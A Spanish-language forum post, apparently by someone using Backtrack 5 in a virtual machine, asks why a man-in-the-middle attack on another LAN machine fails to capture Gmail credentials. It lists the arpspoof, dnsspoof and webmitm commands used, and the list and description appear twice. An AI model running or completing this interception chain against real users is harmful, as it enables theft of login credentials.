Buenas, recientemente he estado experimentando con Backtrack 5 con maquina virtual, y he lanzado un ataque al servidor ssl a otro ordenador de mi lan con lo siguientes comandos:
- echo 1 > /.../ip_forward
-arpspoof - t ipvictima iprouter
-dnsspoof -f archivo.hots (con la direccion de mi ip asignada a tuenti.com y gmail.com)
-webmitm -d (y despues de crear el certificado se pone a escuchar)
--
Hasta ahí todo bien pero cuando en la maquina victima entro en gmail.com me salta el aviso del certificado no valido (hasta aqui, OK) pero luego de insertar user y pass se queda colgado sin cargar la pagina y en la maquina virtual el webmitm ve la conexion establecida pero no llega a coger el pass.
El caso es que el procedimiento esta casi completo pero imagino que algo lo bloquea, haber si me echan una mano
- echo 1 > /.../ip_forward
-arpspoof - t ipvictima iprouter
-dnsspoof -f archivo.hots (con la direccion de mi ip asignada a tuenti.com y gmail.com)
-webmitm -d (y despues de crear el certificado se pone a escuchar)
--
Hasta ahí todo bien pero cuando en la maquina victima entro en gmail.com me salta el aviso del certificado no valido (hasta aqui, OK) pero luego de insertar user y pass se queda colgado sin cargar la pagina y en la maquina virtual el webmitm ve la conexion establecida pero no llega a coger el pass.
El caso es que el procedimiento esta casi completo pero imagino que algo lo bloquea, haber si me echan una mano